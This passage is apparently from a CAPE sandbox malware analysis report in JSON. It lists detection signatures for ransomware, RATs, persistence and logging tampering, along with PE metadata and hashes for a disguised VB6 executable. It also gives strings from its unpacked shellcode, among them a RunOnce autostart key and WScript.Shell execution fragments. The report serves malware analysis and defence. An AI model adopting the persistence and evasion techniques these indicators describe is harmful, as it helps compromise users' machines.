"packer_armadillo_mutex", "time": 0.0 }, { "name": "packer_armadillo_regkey", "time": 0.0 }, { "name": "persistence_ads", "time": 0.0 }, { "name": "persistence_safeboot", "time": 0.0 }, { "name": "persistence_ifeo", "time": 0.0 }, { "name": "persistence_silent_process_exit", "time": 0.0 }, { "name": "persistence_rdp_registry", "time": 0.0 }, { "name": "persistence_rdp_shadowing", "time": 0.0 }, { "name": "persistence_service", "time": 0.0 }, { "name": "persistence_shim_database", "time": 0.0 }, { "name": "powerpool_mutexes", "time": 0.0 }, { "name": "powershell_scriptblock_logging", "time": 0.0 }, { "name": "powershell_command_suspicious", "time": 0.0 }, { "name": "powershell_renamed", "time": 0.0 }, { "name": "powershell_reversed", "time": 0.0 }, { "name": "powershell_variable_obfuscation", "time": 0.0 }, { "name": "prevents_safeboot", "time": 0.0 }, { "name": "cmdline_process_discovery", "time": 0.0 }, { "name": "cryptomix_mutexes", "time": 0.0 }, { "name": "dharma_mutexes", "time": 0.0 }, { "name": "ransomware_extensions", "time": 0.001 }, { "name": "ransomware_files", "time": 0.002 }, { "name": "fonix_mutexes", "time": 0.0 }, { "name": "gandcrab_mutexes", "time": 0.0 }, { "name": "germanwiper_mutexes", "time": 0.0 }, { "name": "medusalocker_mutexes", "time": 0.0 }, { "name": "medusalocker_regkeys", "time": 0.0 }, { "name": "nemty_mutexes", "time": 0.0 }, { "name": "nemty_regkeys", "time": 0.0 }, { "name": "pysa_mutexes", "time": 0.0 }, { "name": "ransomware_radamant", "time": 0.0 }, { "name": "ransomware_recyclebin", "time": 0.0 }, { "name": "revil_mutexes", "time": 0.0 }, { "name": "ransomware_revil_regkey", "time": 0.0 }, { "name": "satan_mutexes", "time": 0.0 }, { "name": "snake_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransomware_cmd", "time": 0.0 }, { "name": "ransomware_stopdjvu", "time": 0.0 }, { "name": "rat_beebus_mutexes", "time": 0.0 }, { "name": "blacknet_mutexes", "time": 0.0 }, { "name": "blackrat_mutexes", "time": 0.0 }, { "name": "crat_mutexes", "time": 0.0 }, { "name": "dcrat_files", "time": 0.0 }, { "name": "dcrat_mutexes", "time": 0.0 }, { "name": "rat_fynloski_mutexes", "time": 0.0 }, { "name": "limerat_mutexes", "time": 0.0 }, { "name": "limerat_regkeys", "time": 0.0 }, { "name": "lodarat_file_behavior", "time": 0.0 }, { "name": "modirat_behavior", "time": 0.0 }, { "name": "njrat_regkeys", "time": 0.0 }, { "name": "obliquerat_files", "time": 0.0 }, { "name": "obliquerat_mutexes", "time": 0.0 }, { "name": "parallax_mutexes", "time": 0.0 }, { "name": "rat_pcclient", "time": 0.0 }, { "name": "rat_plugx_mutexes", "time": 0.0 }, { "name": "rat_poisonivy_mutexes", "time": 0.0 }, { "name": "rat_quasar_mutexes", "time": 0.0 }, { "name": "ratsnif_mutexes", "time": 0.0 }, { "name": "rat_spynet", "time": 0.0 }, { "name": "venomrat_mutexes", "time": 0.0 }, { "name": "warzonerat_files", "time": 0.0 }, { "name": "warzonerat_regkeys", "time": 0.0 }, { "name": "xpertrat_files", "time": 0.0 }, { "name": "xpertrat_mutexes", "time": 0.0 }, { "name": "rat_xtreme_mutexes", "time": 0.0 }, { "name": "recon_fingerprint", "time": 0.0 }, { "name": "remcos_files", "time": 0.0 }, { "name": "remcos_mutexes", "time": 0.0 }, { "name": "remcos_regkeys", "time": 0.0 }, { "name": "rdptcp_key", "time": 0.0 }, { "name": "uses_rdp_clip", "time": 0.0 }, { "name": "uses_remote_desktop_session", "time": 0.0 }, { "name": "removes_networking_icon", "time": 0.0 }, { "name": "removes_pinned_programs", "time": 0.0 }, { "name": "removes_security_maintenance_icon", "time": 0.0 }, { "name": "removes_startmenu_defaults", "time": 0.0 }, { "name": "removes_username_startmenu", "time": 0.0 }, { "name": "spicyhotpot_behavior", "time": 0.0 }, { "name": "sniffer_winpcap", "time": 0.0 }, { "name": "spreading_autoruninf", "time": 0.0 }, { "name": "stealth_hidden_extension", "time": 0.0 }, { "name": "stealth_hiddenreg", "time": 0.0 }, { "name": "stealth_hide_notifications", "time": 0.0 }, { "name": "stealth_webhistory", "time": 0.0 }, { "name": "sysinternals_psexec", "time": 0.0 }, { "name": "sysinternals_tools", "time": 0.0 }, { "name": "tampers_etw", "time": 0.0 }, { "name": "lsa_tampering", "time": 0.0 }, { "name": "tampers_powershell_logging", "time": 0.0 }, { "name": "targeted_flame", "time": 0.0 }, { "name": "territorial_disputes_sigs", "time": 0.009 }, { "name": "trickbot_mutex", "time": 0.0 }, { "name": "fleercivet_mutex", "time": 0.0 }, { "name": "lokibot_mutexes", "time": 0.0 }, { "name": "ursnif_behavior", "time": 0.0 }, { "name": "uses_adfind", "time": 0.0 }, { "name": "uses_ms_protocol", "time": 0.0 }, { "name": "neshta_mutexes", "time": 0.0 }, { "name": "renamer_mutexes", "time": 0.0 }, { "name": "owa_web_shell_files", "time": 0.0 }, { "name": "web_shell_files", "time": 0.0 }, { "name": "web_shell_processes", "time": 0.0 }, { "name": "dotnet_csc_build", "time": 0.0 }, { "name": "multiple_explorer_instances", "time": 0.0 }, { "name": "script_tool_executed", "time": 0.0 }, { "name": "suspicious_certutil_use", "time": 0.0 }, { "name": "suspicious_command_tools", "time": 0.0 }, { "name": "suspicious_mpcmdrun_use", "time": 0.0 }, { "name": "suspicious_ping_use", "time": 0.0 }, { "name": "uses_powershell_copyitem", "time": 0.0 }, { "name": "uses_windows_utilities", "time": 0.0 }, { "name": "uses_windows_utilities_appcmd", "time": 0.0 }, { "name": "uses_windows_utilities_csvde_ldifde", "time": 0.0 }, { "name": "uses_windows_utilities_cipher", "time": 0.0 }, { "name": "uses_windows_utilities_clickonce", "time": 0.0 }, { "name": "uses_windows_utilities_curl", "time": 0.0 }, { "name": "uses_windows_utilities_dsquery", "time": 0.0 }, { "name": "uses_windows_utilities_esentutl", "time": 0.0 }, { "name": "uses_windows_utilities_finger", "time": 0.0 }, { "name": "uses_windows_utilities_mode", "time": 0.0 }, { "name": "uses_windows_utilities_ntdsutil", "time": 0.0 }, { "name": "uses_windows_utilities_nltest", "time": 0.0 }, { "name": "uses_windows_utilities_xcopy", "time": 0.0 }, { "name": "wmic_command_suspicious", "time": 0.0 }, { "name": "scrcons_wmi_script_consumer", "time": 0.0 }, { "name": "allaple_mutexes", "time": 0.0 } ], "reporting": [ { "name": "BinGraph", "time": 0.0 }, { "name": "CAPASummary", "time": 2.275 }, { "name": "MITRE_TTPS", "time": 0.004 }, { "name": "PCAP2CERT", "time": 0.0 } ] }, "target": { "category": "file", "file": { "name": "f1ffd3c13b7bd7f498e8.exe", "path": "/opt/CAPEv2/storage/binaries/f1ffd3c13b7bd7f498e8b718d46509a14bf571c5783d4281adcfafe13291e1fd", "guest_paths": "", "size": 90112, "crc32": "C238C049", "md5": "042d652ca56b0729238362144375138f", "sha1": "4bca8ab86ea5efd9ee04035d91c6db524d3c1d7b", "sha256": "f1ffd3c13b7bd7f498e8b718d46509a14bf571c5783d4281adcfafe13291e1fd", "sha512": "9355342c888d2b39228436dc65034501a0028b612395bcf880b05caa5e7460e6f96b112e9b24c977dc4c1a2d62e4388095424544d3f61d3b22ccd4978142f211", "rh_hash": null, "ssdeep": "768:mn2dLYvkVR0BY9hoH0wMzJHPobQHK/CRT58RarQFh2dLy:mn2dLYMYS9hoHYJHcQhRt8Dh2dLy", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T15093AE31BB3DC12BC1600E3558B2661A2F02BD63B9342B3BD7DD48491E3DA562E5B379", "sha3_384": "c7431eb1045262452810010c10ab6df57cb87cd9ed7043e681ceb6eb7d8d53f26be2a2425ef9c1fe1c5af02634ea02db", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x000011c4", "ep_bytes": "68c8254000e8f0ffffff000000000000", "peid_signatures": null, "reported_checksum": "0x0001ce2a", "actual_checksum": "0x0001ce2a", "osversion": "4.0", "pdbpath": null, "imports": { "MSVBVM60": { "dll": "MSVBVM60.DLL", "imports": [ { "address": "0x401000", "name": "_CIcos" }, { "address": "0x401004", "name": "_adj_fptan" }, { "address": "0x401008", "name": "__vbaFreeVar" }, { "address": "0x40100c", "name": "__vbaFreeVarList" }, { "address": "0x401010", "name": "_adj_fdiv_m64" }, { "address": "0x401014", "name": "_adj_fprem1" }, { "address": "0x401018", "name": "__vbaHresultCheckObj" }, { "address": "0x40101c", "name": "_adj_fdiv_m32" }, { "address": "0x401020", "name": "_adj_fdiv_m16i" }, { "address": "0x401024", "name": "_adj_fdivr_m16i" }, { "address": "0x401028", "name": "_CIsin" }, { "address": "0x40102c", "name": "__vbaChkstk" }, { "address": "0x401030", "name": "EVENT_SINK_AddRef" }, { "address": "0x401034", "name": "__vbaStrCmp" }, { "address": "0x401038", "name": "_adj_fpatan" }, { "address": "0x40103c", "name": "EVENT_SINK_Release" }, { "address": "0x401040", "name": "_CIsqrt" }, { "address": "0x401044", "name": "EVENT_SINK_QueryInterface" }, { "address": "0x401048", "name": "__vbaExceptHandler" }, { "address": "0x40104c", "name": "_adj_fprem" }, { "address": "0x401050", "name": "_adj_fdivr_m64" }, { "address": "0x401054", "name": "__vbaFPException" }, { "address": "0x401058", "name": "__vbaDateVar" }, { "address": "0x40105c", "name": "_CIlog" }, { "address": "0x401060", "name": "_adj_fdiv_m32i" }, { "address": "0x401064", "name": "_adj_fdivr_m32i" }, { "address": "0x401068", "name": "_adj_fdivr_m32" }, { "address": "0x40106c", "name": "_adj_fdiv_r" }, { "address": "0x401078", "name": "__vbaVarDup" }, { "address": "0x40107c", "name": "_CIatan" }, { "address": "0x401080", "name": "__vbaStrMove" }, { "address": "0x401084", "name": "_allmul" }, { "address": "0x40108c", "name": "_CItan" }, { "address": "0x401090", "name": "_CIexp" }, { "address": "0x401094", "name": "__vbaFreeStr" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x000124b4", "size": "0x00000028" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00015000", "size": "0x0000164e" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000228", "size": "0x00000020" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00001000", "size": "0x0000009c" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00001000", "virtual_address": "0x00001000", "virtual_size": "0x000117b0", "size_of_data": "0x00012000", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "4.76" }, { "name": ".data", "raw_address": "0x00013000", "virtual_address": "0x00013000", "virtual_size": "0x000018d8", "size_of_data": "0x00001000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".rsrc", "raw_address": "0x00014000", "virtual_address": "0x00015000", "virtual_size": "0x0000164e", "size_of_data": "0x00002000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "3.74" } ], "overlay": null, "resources": [ { "name": "RT_ICON", "offset": "0x00016366", "size": "0x000002e8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "3.92" }, { "name": "RT_ICON", "offset": "0x0001623e", "size": "0x00000128", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "3.50" }, { "name": "RT_ICON", "offset": "0x00015996", "size": "0x000008a8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.68" }, { "name": "RT_ICON", "offset": "0x0001542e", "size": "0x00000568", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "3.69" }, { "name": "RT_GROUP_ICON", "offset": "0x000153f0", "size": "0x0000003e", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "3.07" }, { "name": "RT_VERSION", "offset": "0x00015180", "size": "0x00000270", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "3.17" } ], "versioninfo": [ { "name": "Translation", "value": "0x0409 0x04b0" }, { "name": "Comments", "value": "Neptune Technologies" }, { "name": "CompanyName", "value": "Neptune Technologies" }, { "name": "ProductName", "value": "bribri" }, { "name": "FileVersion", "value": "2.00" }, { "name": "ProductVersion", "value": "2.00" }, { "name": "InternalName", "value": "snefalds" }, { "name": "OriginalFilename", "value": "snefalds.exe" } ], "imphash": "f68756dc2833873b5ac05b0e38772df2", "timestamp": "2020-11-05 09:01:01", "icon": "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", "icon_hash": "4cd76accfd8f278355fc3f2be95f1501", "icon_fuzzy": "a7f39bc64314e286fa64c2a4d95ae7ec", "icon_dhash": "f0fceaf2f2e8d4f0", "imported_dll_count": 1 }, "data": null, "strings": [ "Neptune Technologies", "s&)+)+))", "w&)+)+&p", "EVENT_SINK_QueryInterface", "GXFUGX/", "VarFileInfo", "MSDataRepeaterLib.DataRepeater", "UUMMCC>", "!hL^;hL", "QYfQfY", "(lVx }", ")hLfF", "bribri", "===///)+)+)+)+)+)+))))", "!hLn hL", "sCB6B2C90-E927-11d1-8C1B-0000F8754DA1", "_CIsqrt", "QYfQfYPfR", "22-)Tgd[g]", "%hL:*", "_adj_fpatan", "?:eZ;4222-*(", "+)))+))", "q?%hL", "99999Y9Y99", "corona", "__vbaFreeVar", "jhhcccHM", "Littlish", "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB", ";#hLFTa", "_adj_fprem", " hLVF", "p)))+))", "StringFileInfo", "`.data", "5===//)", ",n `L", "bT ht", "ProductName", ".text", "Out of string space", "L5 ZLZ hL", "fQfY`", "_hhhc]X", "netvrksadresse", "hetaerio", "DataRepeater1", "QhLl ", "<|8>iG", "fQfYQYh", "__vbaStrMove", "^)hLV", "///)))))))))", "3hjhhccUUE", "2\\Gr8", "_CIlog", "mHV h", "w!hL?", ".!hL>", "_adj_fdiv_m64", "__vbaExceptHandler", ";u|+9tR", "Mn hL", "InternalName", " hC7A", ":EDl\"", "$NH23_gaXgc", "_adj_fdiv_m32", "))))))))))", "(hLX!", "%& ht", "MSVBVM60.DLL", "afQfYQYHQYfR", "hLl 8", "fZfQfY", "karnappen", "5fQfY-4", "FileVersion", "tfQfYj@`", "Translation", " hLVx%}", "h__hhhhhcc]HMMMCC=&", "cccUUUE", "Lc YL( ", "0hLVJ", "MSDataRepeaterLib", "__vbaDateVar", "CompanyName", "Demografiens", "Lavaged9", "?HY8Ega2)Tg>", " hC7A1", "!hLPw", "B_fYPKK<6", ")))))))", "74--)Tgg]", " hLfF", "y) h*", "_adj_fdivr_m16i", "-P;@%", "jafQfY`", "?&n", "u5=/)+)+)", "===/)+)", "===///)+)+)+)+)+)+))))", "?\"LSVQL9", "))+)+)+", "h__hhhhhcc]HMMMCC=&", "cccUUUE", "lhhhhlflfUUMC", "r&))))+)+)))", "22-)Tgd[g]", "?:eZ;4222-*(", "&MMCCC=/0&+)+)+)))+)))+)))", "+)))+))", "ZS7E422-B(!", "s&)))+)+))", "))))))))))))))", "t&))),", "99999Y9Y99", "jhhcccHM", "?HY8Ega2)Tg>", "p)))+))", "B_fYPKK<6", "lhhhhhhhhcUUMMCM=", "5===//)", ")))))))", "74--)Tgg]", "H722-_ggd", "z&///)+)", "_hhhc]X", "lhhhh_", "CCC==///)+)+)+)+)+)+)+))", "lhchcUHP", "///)))))))))", "MCC===/", "Root Entry", "3hjhhccUUE", ")))+))", "y&//))+)+)+)" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 0, "cape_type": "", "pid": "" } ], "CAPE": { "payloads": [ { "name": "1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed", "path": "/opt/CAPEv2/storage/analyses/278/CAPE/1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed", "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe;?0x00560000;?", "size": 55720, "crc32": "9CD20E00", "md5": "b90996a7dac56cc07e74c6baf28b36de", "sha1": "f4ad3bcf72ce7319b3bf508ecc043cacb16e15e4", "sha256": "1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed", "sha512": "035992b56f5e20806d911b08603659a0a4b513752642e3493081c16bb22ec41284c54e98cbb72a723bbb3fdcaf04ca4377f675a18c76d0b9a123c4bdd1eb8607", "rh_hash": null, "ssdeep": "768:D6ifyTQAaQdfoVbxtPPd2WS6NGmsCQ7Mbdx:mi6TQnQdfoVb7Rl2kdx", "type": "DOS executable (COM)", "yara": [ { "name": "HeavensGate", "meta": { "author": "kevoreilly", "description": "Heaven's Gate: Switch from 32-bit to 64-mode", "cape_type": "Heaven's Gate" }, "strings": [ "{ 5A 66 BB 33 00 66 53 50 89 E0 83 C4 06 FF 28 }" ], "addresses": { "gate_v3": 50403 } } ], "cape_yara": [], "clamav": [], "tlsh": "T1E543BD60E0A1331D80D51DEF8FC61EF25627A496E8290B7E6EADDF762B349E4184CF05", "sha3_384": "5c860a8a9821807f6daffb996e6ffa053db9139292f630f3cef622baad26ae5bb680c3580c5b562b494842179f684388", "data": null, "strings": [ "@ PXH1", "PXYPX", "x`H^9", "HH^(l", "C:\\Program Files\\qga\\qga.exe", "(PXAZI", "x`H^f", "Hx`H^(l", "f=ff9", "x`H^8", "P`H^(l", "DH^(l", "user32", "wininet.dll", "x`H^(`", "x`Hf9", "windir=", "L`H^(l", "kernel32", "x`H^(l`", "PXPXA", "Lx`H^(l", "x`H^`", "D`H^(l", "PXAZI", "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "LH^(l", "Set W = CreateObject(\"WScript.Shell\")", "Px`H^(l", "PXPXH1", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "MZtQfA", "x`H^(l", "C:\\Program Files\\Qemu-ga\\qemu-ga.exe", "\\subfolder1", "M\\f=t", "@`PXH", "advapi32", "X PXH", "ntdll", "ARPXPXH", "PXPX[_^PXA_PXA^A]A\\PXA[AZPXAYPXAXZ", "shell32", "PXPXdH", "x`H^(", "PXPXPXPXPXRAPPXAQPXARPXASATPXAUPXAVAWVWSPXPXdH", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "x`H^(lf9", "@0PXg", "~*PXg", "Msi.dll", "TEMP=", "msvbvm60.dll", "x`H^(lf", "x`H^(f9", "$0Df9", "x`H^(8", "t4PX=", "H`H^(l", "PH^(l", "PXPXM1", "L;UDu", "\\syswow64\\", "x`H^(f", "x`H^(l9", "\\system32\\", "x`H^(l8", "Dx`H^(l", "x`H^(9", "Startup key", "\\filename1.exe", "Publisher", "x`H^f9", "Set C = W.Exec (\"" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 9, "cape_type": "Unpacked Shellcode", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "process_name": "f1ffd3c13b7bd7f498e8.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "pid": 3552, "virtual_address": "0x00560000" }, { "name": "9de676b22a900194fd11c41539f2df6b0ebb6d9d24f1a413c342c535aa40a406", "path": "/opt/CAPEv2/storage/analyses/278/CAPE/9de676b22a900194fd11c41539f2df6b0ebb6d9d24f1a413c342c535aa40a406", "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe;?0x02250000;?", "size": 38401, "crc32": "DE384CF6", "md5": "18f60fe2824881cdf82175443864d4ca", "sha1": "528ec8e46390230b93f8558a7332942aa9a95abe", "sha256": "9de676b22a900194fd11c41539f2df6b0ebb6d9d24f1a413c342c535aa40a406", "sha512": "5def9cedb5e17fb17631a943d8dc48e9d95178da830e95283ca1e8ac584496eedc71c594d16b95d0465543409a87ad5b67f040f7571bbd45f1b4a0bcc8f9af8f", "rh_hash": null, "ssdeep": "384:2/VIwAjkrdGJObIiT2APLO2c2ZXbHB83TXcCZ47v18:2/58JKPawLHO3Tf4T18", "type": "data", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T12303919777D391006A08BEB5C056878FEB06CF18FA76D76AD39C34C71351A6AB70C0A9", "sha3_384": "78f973041ff46b24cac93a94df61a45f44320f1f78aff54c1a9fbf4bafd2002dd63a375c795cfb6b2a11ddd924797389", "data": null, "strings": [], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 9, "cape_type": "Unpacked Shellcode", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "process_name": "f1ffd3c13b7bd7f498e8.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "pid": 9224, "virtual_address": "0x02250000" } ], "configs": [] }, "info": { "version": "2.4-CAPE", "started": "2025-02-28 00:33:47", "ended": "2025-02-28 00:37:17", "duration": 210, "id": 278, "category": "file", "custom": "", "machine": { "id": 278, "status": "stopping", "name": "custom", "label": "win10", "platform": "windows", "manager": "KVM", "started_on": "2025-02-28 00:33:47", "shutdown_on": "2025-02-28 00:37:16" }, "package": "exe", "timeout": true, "shrike_url": null, "shrike_refer": null, "shrike_msg": null, "shrike_sid": null, "parent_id": null, "tlp": null, "parent_sample": {}, "options": {}, "source_url": null, "route": "false", "user_id": 0, "CAPE_current_commit": "f89c890143b59bdbcc9b9c8b5e15fbc5fd827afd" }, "behavior": { "processes": [ { "process_id": 9224, "process_name": "f1ffd3c13b7bd7f498e8.exe", "parent_id": 4168, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "first_seen": "2025-02-27 23:34:12,753", "calls": [ { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764fc461", "parentcaller": "0x731e271a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x764f960d", "parentcaller": "0x7587f804", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": false, "return": "0xffffffffc0000139", "pretty_return": "ENTRYPOINT_NOT_FOUND", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsTNT" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x00000000" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-02-27 23:34:13,425", "thread_id": "3892", "caller": "0x731ff8f2", "parentcaller": "0x7719e012", "category": "misc", "api": "HeapCreate", 